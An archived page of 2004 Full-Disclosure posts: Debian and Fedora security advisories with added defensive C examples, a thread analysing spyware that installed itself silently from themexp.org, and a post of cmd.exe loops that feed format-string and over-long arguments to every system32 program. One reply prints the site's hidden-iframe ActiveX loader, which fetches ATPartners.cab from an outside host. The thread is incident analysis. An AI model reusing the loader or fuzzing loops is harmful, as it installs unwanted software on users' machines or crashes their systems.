
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] [SECURITY] [DSA 557-1] New rp-pppoe packages fix potential root compromise

From: debian-security-announce@lists.debian.org
Date: Mon Oct 04 2004 - 05:16:41 CDT



--------------------------------------------------------------------------
Debian Security Advisory DSA 557-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 4th, 2004                       http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package : rp-pppoe, pppoe
Vulnerability : missing privilege dropping
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2004-0564

Max Vozeler discovered a vulnerability in pppoe, the PPP over Ethernet
driver from Roaring Penguin. When the program is running setuid root
(which is not the case in a default Debian installation), an attacker
could overwrite any file on the file system.

For the stable distribution (woody) this problem has been fixed in
version 3.3-1.2.

For the unstable distribution (sid) this problem has been fixed in
version 3.5-4.

We recommend that you upgrade your pppoe package.
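
As an added example (not the advisory's text and not rp-pppoe's own code), the privilege-dropping pattern a setuid-root helper needs before it opens a file whose path the invoking user chose; the log path, the helper names and the check that the drop is irreversible are assumptions for illustration:

```c
/* Added example, not rp-pppoe's code: a setuid-root helper that must write
 * to a file chosen by the invoking user. The defect class in DSA 557-1 is
 * doing that open() while still root, which lets the caller target any file
 * on the system. The fix is to become the real user first, permanently. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently drop to the real (invoking) user's identity.
 * Order matters: supplementary groups and gid first, uid last, because once
 * the uid is unprivileged the gid can no longer be changed. Returns 0 on
 * success, -1 if any step failed or the drop turned out to be reversible. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (geteuid() == 0 && setgroups(1, &rgid) != 0)
        return -1;                 /* only root may reset the group list */
    if (setresgid(rgid, rgid, rgid) != 0)
        return -1;
    if (setresuid(ruid, ruid, ruid) != 0)
        return -1;

    /* Setting all three ids (real, effective, saved) means a later
     * seteuid(0) must fail; if it succeeds, the drop did not stick. */
    if (ruid != 0 && (seteuid(0) == 0 || setuid(0) == 0))
        return -1;
    return (getuid() == ruid && geteuid() == ruid) ? 0 : -1;
}

/* Append msg to the user-chosen path with the user's own rights. Opened
 * O_NOFOLLOW so a symlink planted at the path cannot redirect the write,
 * and checked to be a regular file. Returns bytes written or -1. */
ssize_t append_user_log(const char *path, const char *msg)
{
    struct stat st;
    int fd;
    ssize_t n;

    if (geteuid() == 0 && getuid() != 0)
        return -1;                 /* refuse to do this step as root */

    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0640);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    n = write(fd, msg, strlen(msg));
    close(fd);
    return n;
}

int main(int argc, char **argv)
{
    /* "/tmp/pppoe-example.log" is a constructed default, not a path used
     * by rp-pppoe. */
    const char *path = argc > 1 ? argv[1] : "/tmp/pppoe-example.log";

    /* The vulnerable ordering would be: append_user_log() here, while
     * still root, and only then (or never) drop_privileges(). */
    if (drop_privileges() != 0) {
        fprintf(stderr, "cannot drop privileges: %s\n", strerror(errno));
        return 1;
    }
    if (append_user_log(path, "session started\n") < 0) {
        fprintf(stderr, "cannot write %s: %s\n", path, strerror(errno));
        return 1;
    }
    return 0;
}
```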

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
--------------------------------


  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>




 
[Full-Disclosure] [FLSA-2004:1324] Updated libxml2 resolves security vulnerability

From: Marc Deslauriers (marcdeslauriers@videotron.ca)
Date: Mon Oct 04 2004 - 07:00:34 CDT


-----------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis: Updated libxml2 resolves security vulnerability
Advisory ID: FLSA:1324
Issue date: 2004-10-04
Product: Red Hat Linux
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1324
CVE Names: CAN-2004-0110
-----------------------------------------------------------------------

-----------------------------------------------------------------------
1. Topic:

[Updated 4th October 2004]
The packages contained in the original release of this advisory were
missing python 2.2 support. These updated packages restore the missing
functionality.

Updated libxml2 packages that fix an overflow when parsing remote
resources are now available.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386

3. Problem description:

libxml2 is a library for manipulating XML files.

Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6.
When fetching a remote resource via FTP or HTTP, libxml2 uses special
parsing routines. These routines can overflow a buffer if passed a very
long URL. If an attacker is able to find an application using libxml2
that parses remote resources and allows them to influence the URL, then
this flaw could be used to execute arbitrary code. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CAN-2004-0110 to this issue.

All users are advised to upgrade to these updated packages, which
contain a backported fix and are not vulnerable to this issue.

Fedora Legacy would like to thank Johnny Strom for reporting this issue.
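
The overflow described in the problem description comes from copying part of a URL into a fixed-size buffer without checking its length. As an added example (not libxml2's own code), a bounds-checked scanner for the scheme, host and port of the http:// and ftp:// URLs such a fetcher handles; the HOST_MAX limit and the helper names are assumptions:

```c
/* Added example, not libxml2's code: scanning an http:// or ftp:// URL into
 * fixed-size fields before a remote fetch. Every copy into a fixed buffer is
 * length-checked, so an over-long host name is rejected instead of running
 * past the end of the buffer. */
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX 256   /* constructed limit, including the terminating NUL */

struct remote_url {
    char scheme[8];
    char host[HOST_MAX];
    int  port;
};

/* Returns 0 and fills *out on success; -1 on malformed or over-long input.
 * Never writes past the bounds of out->scheme or out->host. */
int scan_remote_url(const char *url, struct remote_url *out)
{
    const char *p = url, *sep;
    size_t n;

    memset(out, 0, sizeof *out);

    /* Scheme: only http and ftp are accepted, each with its default port. */
    sep = strstr(p, "://");
    if (sep == NULL)
        return -1;
    n = (size_t)(sep - p);
    if (n >= sizeof out->scheme)
        return -1;
    memcpy(out->scheme, p, n);
    out->scheme[n] = '\0';
    if (strcmp(out->scheme, "http") == 0)
        out->port = 80;
    else if (strcmp(out->scheme, "ftp") == 0)
        out->port = 21;
    else
        return -1;
    p = sep + 3;

    /* Host: runs to ':', '/' or end of string. The length test inside the
     * loop is exactly the check an unbounded copy loop lacks. */
    for (n = 0; p[n] != '\0' && p[n] != ':' && p[n] != '/'; n++) {
        if (n + 1 >= HOST_MAX)
            return -1;
    }
    if (n == 0)
        return -1;
    memcpy(out->host, p, n);
    out->host[n] = '\0';
    p += n;

    /* Optional :port, which must be a decimal number in 1..65535 followed
     * by the path or by the end of the URL. */
    if (*p == ':') {
        char *end;
        long port;
        p++;
        if (!isdigit((unsigned char)*p))
            return -1;
        port = strtol(p, &end, 10);
        if (port < 1 || port > 65535 || (*end != '\0' && *end != '/'))
            return -1;
        out->port = (int)port;
    }
    return 0;
}

/* Checking helper: 1 if url parses to the expected host and port. */
int url_scans_to(const char *url, const char *host, int port)
{
    struct remote_url u;
    if (scan_remote_url(url, &u) != 0)
        return 0;
    return strcmp(u.host, host) == 0 && u.port == port;
}

/* Checking helper: builds a URL whose host is host_len characters long (the
 * input class the advisory describes) and returns 1 if it is rejected. */
int long_host_rejected(size_t host_len)
{
    struct remote_url u;
    char *url = malloc(host_len + 16);
    int rejected;
    if (url == NULL)
        return 0;
    strcpy(url, "http://");
    memset(url + 7, 'a', host_len);
    strcpy(url + 7 + host_len, "/x.xml");
    rejected = scan_remote_url(url, &u) != 0;
    free(url);
    return rejected;
}
```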

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which
are not installed but included in the list will not be updated. Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system. This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1324 - libxml2: an overflow when parsing
remote resources.

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/libxml2-2.4.19-6.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libxml2-2.4.19-6.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libxml2-python-2.4.19-6.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libxml2-devel-2.4.19-6.legacy.i386.rpm

7. Verification:


These packages are GPG signed by Fedora Legacy for security. Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0110
https://www.redhat.com/archives/redhat-watch-list/2004-February/msg00007.html
http://mail.gnome.org/archives/xml/2004-February/msg00070.html

9. Contact:

The Fedora Legacy security contact is <secnotice@fedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------




 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Geraldo Rivera (iamafraud@hotmail.com)
Date: Mon Oct 04 2004 - 08:47:08 CDT


themexp.org

I should have logged all the files and reg entries I deleted, but it was
late at night and I wasn't really thinking about that at the time. I just
checked my IE history for some of the things I googled and I found a bunch
of them:

SahAgent.exe
webrebates0.exe
lu.dat
preInsln.exe
Systb.dll
wupdater.exe
eakrfu.exe
wupdt.exe
megasearch toolbar (www.megasearchbar.com)
IEPlugin
localnrd.dll
multimpp.dll

>From: "Joel R. Helgeson" <joel@helgeson.com>
>To: "Geraldo Rivera"
><iamafraud@hotmail.com>,<full-disclosure@lists.netsys.com>
>Subject: Re: [Full-Disclosure] Spyware installs with no interaction in IE
>on fully patched XP SP2 box
>Date: Sun, 3 Oct 2004 14:13:52 -0500
>
>What was the site?
>
>Joel R. Helgeson
>Director of Networking & Security Services
>SymetriQ Corporation
>
>"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll
>be warm for the rest of his life."
>----- Original Message ----- From: "Geraldo Rivera" <iamafraud@hotmail.com>
>To: <full-disclosure@lists.netsys.com>
>Sent: Sunday, October 03, 2004 1:16 PM
>Subject: [Full-Disclosure] Spyware installs with no interaction in IE on
>fully patched XP SP2 box
>
>
>>Last night I went to a site that I have been to on and off for years. The
>>page loaded and then in IE's status bar I saw something suspicious:
>>"installing components...atpartners.cab". I could not close out of IE, and
>>I could not kill the iexplorer.exe process. It totally locked up and I had
>>to reboot my machine. When my machine came back up, I had at least 6
>>different pieces of spyware/adware on my machine. It took me almost 2 hrs
>>to clean up. I manually deleted a bunch of crap (stuff I had found through
>>the run key in the registry, suspicious processes running, suspicious
>>files in the usual dir's, and by searching for all files modified at the
>>time this happened). Even after all that, Ad-Aware found 143 entries (none
>>were cookies, mostly registry entries and a few dll's) and then Spybot
>>found an additional 2 registry entries.
>>
>>This machine is a fully patched XP SP2 box, with the default security
>>settings for IE's Internet Zone. Does anybody know what method this crap
>>could be using to install without any user interaction?



 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Carr, Robert (rcarr@email.uky.edu)
Date: Mon Oct 04 2004 - 09:23:41 CDT


Interesting...

I just went there, and he's right. Atpartners.cab installed without
permission. My McAfee picked it right up as Atpartners.dll, downloaded
to Temp Internet files. Spyware detected as NetPals. On the other hand,
I'm admin of my machine, I wonder if a "user" would get an error message
about not having the correct rights...

Thanks,
 
Robert

-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Geraldo Rivera
Sent: Monday, October 04, 2004 9:47 AM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Spyware installs with no interaction in IE
on fully patched XP SP2 box

themexp.org

I should have logged all the files and reg entries I deleted, but it was
late at night and I wasn't really thinking about that at the time. I just
checked my IE history for some of the things I googled and I found a bunch
of them:

SahAgent.exe
webrebates0.exe
lu.dat
preInsln.exe
Systb.dll
wupdater.exe
eakrfu.exe
wupdt.exe
megasearch toolbar (www.megasearchbar.com)
IEPlugin
localnrd.dll
multimpp.dll

>From: "Joel R. Helgeson" <joel@helgeson.com>
>To: "Geraldo Rivera"
><iamafraud@hotmail.com>,<full-disclosure@lists.netsys.com>
>Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
>IE on fully patched XP SP2 box
>Date: Sun, 3 Oct 2004 14:13:52 -0500
>
>What was the site?
>
>Joel R. Helgeson
>Director of Networking & Security Services
>SymetriQ Corporation
>
>"Give a man fire, and he'll be warm for a day; set a man on fire, and
>he'll be warm for the rest of his life."
>----- Original Message ----- From: "Geraldo Rivera"
><iamafraud@hotmail.com>
>To: <full-disclosure@lists.netsys.com>
>Sent: Sunday, October 03, 2004 1:16 PM
>Subject: [Full-Disclosure] Spyware installs with no interaction in IE
>on fully patched XP SP2 box
>
>
>>Last night I went to a site that I have been to on and off for years.
>>The page loaded and then in IE's status bar I saw something suspicious:
>>"installing components...atpartners.cab". I could not close out of IE,
>>and I could not kill the iexplorer.exe process. It totally locked up and
>>I had to reboot my machine. When my machine came back up, I had at least
>>6 different pieces of spyware/adware on my machine. It took me almost 2
>>hrs to clean up. I manually deleted a bunch of crap (stuff I had found
>>through the run key in the registry, suspicious processes running,
>>suspicious files in the usual dir's, and by searching for all files
>>modified at the time this happened). Even after all that, Ad-Aware found
>>143 entries (none were cookies, mostly registry entries and a few dll's)
>>and then Spybot found an additional 2 registry entries.
>>
>>This machine is a fully patched XP SP2 box, with the default security
>>settings for IE's Internet Zone. Does anybody know what method this crap
>>could be using to install without any user interaction?
>>


 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Matt Andreko (mandreko@ori.net)
Date: Mon Oct 04 2004 - 09:26:35 CDT


I was unable to verify it, since I don't use IE, and would prefer not
infecting myself on accident, however I did run across this:

http://themexp.org/about_wrap.php

Perhaps one of the themes you downloaded was bundled with the spyware?

Geraldo Rivera wrote:
> themexp.org
>
> I should have logged all the files and reg entries I deleted, but it was
> late at night and I wasn't really thinking about that at the time. I
> just checked my IE history for some of the things I googled and I found
> a bunch of them:
>
> SahAgent.exe
> webrebates0.exe
> lu.dat
> preInsln.exe
> Systb.dll
> wupdater.exe
> eakrfu.exe
> wupdt.exe
> megasearch toolbar (www.megasearchbar.com)
> IEPlugin
> localnrd.dll
> multimpp.dll
>
>> From: "Joel R. Helgeson" <joel@helgeson.com>
>> To: "Geraldo Rivera"
>> <iamafraud@hotmail.com>,<full-disclosure@lists.netsys.com>
>> Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
>> IE on fully patched XP SP2 box
>> Date: Sun, 3 Oct 2004 14:13:52 -0500
>>
>> What was the site?
>>
>> Joel R. Helgeson
>> Director of Networking & Security Services
>> SymetriQ Corporation
>>
>> "Give a man fire, and he'll be warm for a day; set a man on fire, and
>> he'll be warm for the rest of his life."
>> ----- Original Message ----- From: "Geraldo Rivera"
>> <iamafraud@hotmail.com>
>> To: <full-disclosure@lists.netsys.com>
>> Sent: Sunday, October 03, 2004 1:16 PM
>> Subject: [Full-Disclosure] Spyware installs with no interaction in IE
>> on fully patched XP SP2 box
>>
>>
>>> Last night I went to a site that I have been to on and off for years.
>>> The page loaded and then in IE's status bar I saw something
>>> suspicious: "installing components...atpartners.cab". I could not
>>> close out of IE, and I could not kill the iexplorer.exe process. It
>>> totally locked up and I had to reboot my machine. When my machine
>>> came back up, I had at least 6 different pieces of spyware/adware on
>>> my machine. It took me almost 2 hrs to clean up. I manually deleted a
>>> bunch of crap (stuff I had found through the run key in the registry,
>>> suspicious processes running, suspicious files in the usual dir's,
>>> and by searching for all files modified at the time this happened).
>>> Even after all that, Ad-Aware found 143 entries (none were cookies,
>>> mostly registry entries and a few dll's) and then Spybot found an
>>> additional 2 registry entries.
>>>
>>> This machine is a fully patched XP SP2 box, with the default security
>>> settings for IE's Internet Zone. Does anybody know what method this
>>> crap could be using to install without any user interaction?
>>>



 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Todd Towles (toddtowles@brookshires.com)
Date: Mon Oct 04 2004 - 09:47:44 CDT


Aren't there still cross-scripting problems with IE? Plus I think the Drag
and Drop exploit is still unpatched? Comments anyone?

> -----Original Message-----
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of
> Harlan Carvey
> Sent: Sunday, October 03, 2004 2:37 PM
> To: full-disclosure@lists.netsys.com
> Cc: Joel R. Helgeson; Geraldo Rivera
> Subject: Re: [Full-Disclosure] Spyware installs with no
> interaction in IE on fully patched XP SP2 box
>
>
> > > This machine is a fully patched XP SP2 box, with
> > the default security
> > > settings for IE's Internet Zone. Does anybody know
> > what method this crap
> > > could be using to install without any user
> > interaction?
>
> It's a little hard to tell accurately without taking a look
> at what you removed; ie, saying that you cleaned things out
> of the Registry is great, but without knowing what keys you
> "cleaned", it's hard to tell.
>
> However, doing a quick search on Google for "atpartners",
> some of the info I found points to BHOs...
>
> Sorry, wish I could help more, but I'd need more info...
>
> =====
> ------------------------------------------
> Harlan Carvey, CISSP
> "Windows Forensics and Incident Recovery"
> http://www.windows-ir.com
> http://groups.yahoo.com/group/windowsir/
>
> "Meddle not in the affairs of dragons, for you are crunchy,
> and good with ketchup."
>
> "The simplicity of this game amuses me.
> Bring me your finest meats and cheeses."
> ------------------------------------------
>


 
[Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Willem Koenings (isec@europe.com)
Date: Mon Oct 04 2004 - 09:55:19 CDT


hi,

> I was unable to verify it, since I don't use IE, and would prefer not
> infecting myself on accident, however I did run across this:
>
> http://themexp.org/about_wrap.php
>
> Perhaps one of the themes you downloaded was bundled with the spyware?

two tiny links from there:

http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab

W.



 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Todd Towles (toddtowles@brookshires.com)
Date: Mon Oct 04 2004 - 09:51:04 CDT


Yep, Themexp.org was my wallpaper stop for a while. But it was taken over
by new owners a while ago and it is turning south, into an
adware/spyware/pop-up site. Kinda sad, it was a very good site.

> -----Original Message-----
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of
> Geraldo Rivera
> Sent: Monday, October 04, 2004 8:47 AM
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Spyware installs with no
> interaction in IE on fully patched XP SP2 box
>
> themexp.org
>
> I should have logged all the files and reg entries I deleted,
> but it was late at night and I wasn't really thinking about
> that at the time. I just checked my IE history for some of
> the things I googled and I found a bunch of them:
>
> SahAgent.exe
> webrebates0.exe
> lu.dat
> preInsln.exe
> Systb.dll
> wupdater.exe
> eakrfu.exe
> wupdt.exe
> megasearch toolbar (www.megasearchbar.com)
> IEPlugin
> localnrd.dll
> multimpp.dll
>
> >From: "Joel R. Helgeson" <joel@helgeson.com>
> >To: "Geraldo Rivera"
> ><iamafraud@hotmail.com>,<full-disclosure@lists.netsys.com>
> >Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
> >IE on fully patched XP SP2 box
> >Date: Sun, 3 Oct 2004 14:13:52 -0500
> >
> >What was the site?
> >
> >Joel R. Helgeson
> >Director of Networking & Security Services
> >SymetriQ Corporation
> >
> >"Give a man fire, and he'll be warm for a day; set a man on fire, and
> >he'll be warm for the rest of his life."
> >----- Original Message ----- From: "Geraldo Rivera"
> ><iamafraud@hotmail.com>
> >To: <full-disclosure@lists.netsys.com>
> >Sent: Sunday, October 03, 2004 1:16 PM
> >Subject: [Full-Disclosure] Spyware installs with no interaction in IE
> >on fully patched XP SP2 box
> >
> >
> >>Last night I went to a site that I have been to on and off for years.
> >>The page loaded and then in IE's status bar I saw something suspicious:
> >>"installing components...atpartners.cab". I could not close out of IE,
> >>and I could not kill the iexplorer.exe process. It totally locked up
> >>and I had to reboot my machine. When my machine came back up, I had at
> >>least 6 different pieces of spyware/adware on my machine. It took me
> >>almost 2 hrs to clean up. I manually deleted a bunch of crap (stuff I
> >>had found through the run key in the registry, suspicious processes
> >>running, suspicious files in the usual dir's, and by searching for all
> >>files modified at the time this happened). Even after all that,
> >>Ad-Aware found 143 entries (none were cookies, mostly registry entries
> >>and a few dll's) and then Spybot found an additional 2 registry entries.
> >>
> >>This machine is a fully patched XP SP2 box, with the default security
> >>settings for IE's Internet Zone. Does anybody know what method this
> >>crap could be using to install without any user interaction?
> >>


 
[Full-Disclosure] Test your windows OS

From: Berend-Jan Wever (skylined@edup.tudelft.nl)
Date: Mon Oct 04 2004 - 10:39:06 CDT


Hi all,

Wanna do a quick test to see if the programmers that wrote your Windows operating system have any clue as to what they're doing? Run these commands from cmd.exe in the system32 directory:

for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as cmd.exe allows on one line.)

Each command will execute every program in your system32 directory; most of them will either ignore the parameter or report an error because the parameter doesn't make sense... But on my win2k system I found 6 programs vulnerable to these very simple format string and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?

These are not vulnerabilities in themselves: you cannot gain access or elevate privileges, but I just wanted to let you know that these programmers did a sloppy job.

Cheers,
SkyLined



 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Mark Shirley (mshirley@gmail.com)
Date: Mon Oct 04 2004 - 10:21:49 CDT


var exepath='http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab';
var retry_enabled = true;
var retry_cnt=1;

executeScript(getCookie('minpopup80wu03rd'));

function executeScript(CookieExists) {

        //Check if cookie exists, if it does we know the user has visited the
        //site within the last 24 hrs so don't load the script
        if (CookieExists!=null) {

                //If cookie does exists then exit
                return null;

        }
        else {

                //If cookie does not exist then we can assume the user has not been
                //to the site within the last 24 hrs
                document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');

                document_code = '<html><head>\n';
                document_code += '<\/head><body>\n';
                document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID" VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
                document_code += '<\/body><\/html>';
                downloads_manager.document.write(document_code);
                downloads_manager.document.close();

                setCookie('minpopup80wu03rd','test',1);

        }
}

function retry()
{
        //if(retry_cnt>0)
        //{
                //setCookie('minpopup80wu03rd','test',0);
                //alert("To install latest At-Games Games update, please click Yes");
                //document_code = '<html><head>\n';
                //document_code += '<\/head><body>\n';
                //document_code += '<object id="DDownload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0 WIDTH=0></object>\n';
                //document_code += '<\/body><\/html>';
                //downloads_manager.document.write(document_code);
                //downloads_manager.document.close();
                //setCookie('minpopup80wu03rd','test',1);
                //retry_cnt--;
        //} else {
                //alert("This is a 1 time install, once you click Open it will never pop up this message again");
                //window.location = "http://www.NetpalOffers.net/NetpalOffers/DMOXe/80wu03rd.exe";
        //}
}

function getCookie(NameOfCookie) {

        if (document.cookie.length > 0) {

                begin = document.cookie.indexOf(NameOfCookie+"=");
                if (begin != -1) {

                        begin += NameOfCookie.length+1;
                        end = document.cookie.indexOf(";", begin);

                        if (end == -1) end = document.cookie.length;
                        return unescape(document.cookie.substring(begin, end));
                }
        }
        return null;

}

function setCookie(NameOfCookie, value, expiredays) {

        var ExpireDate = new Date ();
        ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));

        document.cookie = NameOfCookie + "=" + escape(value) +
                ((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Michael Simpson (Michael.Simpsoninveresk.com)
Date: Mon Oct 04 2004 - 09:56:49 CDT


nope, there is no error message when accessing this site as a user - just
a very quick flash of a pop-up going to wepdt(?).gator.something.
  There doesn't appear to be any trace on this computer of any of the
files mentioned previously, so I guess that you may need to be running as
admin to get the download.

cheers,

mikie

"Carr, Robert" <rcarremail.uky.edu>
Sent by: full-disclosure-adminlists.netsys.com
04/10/2004 15:23

To
<full-disclosurelists.netsys.com>
cc

Subject
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully
patched XP SP2 box

Interesting...

I just went there, and he's right. Atpartners.cab installed without
permission. My McAfee picked it right up as Atpartners.dll, downloaded
to Temp Internet files. Spyware detected as NetPals. On the other hand,
I'm admin of my machine, I wonder if a "user" would get an error message
about not having the correct rights...

Thanks,
 
Robert

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Geraldo
Rivera
Sent: Monday, October 04, 2004 9:47 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
IE on fully patched XP SP2 box

themexp.org

I should have logged all the files and reg entries I deleted, but it was
late at night and I wasn't really thinking about that at the time. I just
checked my IE history for some of the things I googled and I found a bunch
of them:

SahAgent.exe
webrebates0.exe
lu.dat
preInsln.exe
Systb.dll
wupdater.exe
eakrfu.exe
wupdt.exe
megasearch toolbar (www.megasearchbar.com)
IEPlugin
localnrd.dll
multimpp.dll

>From: "Joel R. Helgeson" <joelhelgeson.com>
>To: "Geraldo Rivera" <iamafraudhotmail.com>,<full-disclosurelists.netsys.com>
>Subject: Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box
>Date: Sun, 3 Oct 2004 14:13:52 -0500
>
>What was the site?
>
>Joel R. Helgeson
>Director of Networking & Security Services
>SymetriQ Corporation
>
>"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll
>be warm for the rest of his life."
>----- Original Message ----- From: "Geraldo Rivera" <iamafraudhotmail.com>
>To: <full-disclosurelists.netsys.com>
>Sent: Sunday, October 03, 2004 1:16 PM
>Subject: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box
>
>
>>Last night I went to a site that I have been to on and off for years. The
>>page loaded and then in IE's status bar I saw something suspicious:
>>"installing components...atpartners.cab". I could not close out of IE, and
>>I could not kill the iexplorer.exe process. It totally locked up and I had
>>to reboot my machine. When my machine came back up, I had at least 6
>>different pieces of spyware/adware on my machine. It took me almost 2 hrs
>>to clean up. I manually deleted a bunch of crap (stuff I had found through
>>the run key in the registry, suspicious processes running, suspicious
>>files in the usual dirs, and by searching for all files modified at the
>>time this happened). Even after all that, Ad-Aware found 143 entries (none
>>were cookies, mostly registry entries and a few dlls) and then Spybot
>>found an additional 2 registry entries.
>>
>>This machine is a fully patched XP SP2 box, with the default security
>>settings for IE's Internet Zone. Does anybody know what method this crap
>>could be using to install without any user interaction?
>>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patchedXP SP2 box

From: Willem Koenings (iseceurope.com)
Date: Mon Oct 04 2004 - 10:40:39 CDT


hi,
 
> > I was unable to verify it, since I don't use IE, and would prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with the spyware?
>
> two tiny links from there:
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab

btw, old trusty IE 5.01 + manually configured security settings =
no problem at all. either XP+SP2 seriously broke something in IE
or Geraldo Rivera has just poorly configured Internet settings.

W.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Todd Towles (toddtowlesbrookshires.com)
Date: Mon Oct 04 2004 - 10:37:05 CDT


To expand on this "About Wrap". I have posted images to this site
before....before the site went downhill. Some of the authors would allow
the site to wrap their images with ads (therefore making money for the
site). It appears they are now wrapping images with installed ad-ware.

It appears the new owners have taken it over for the money. Not the
artwork. Just my 2 cents

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
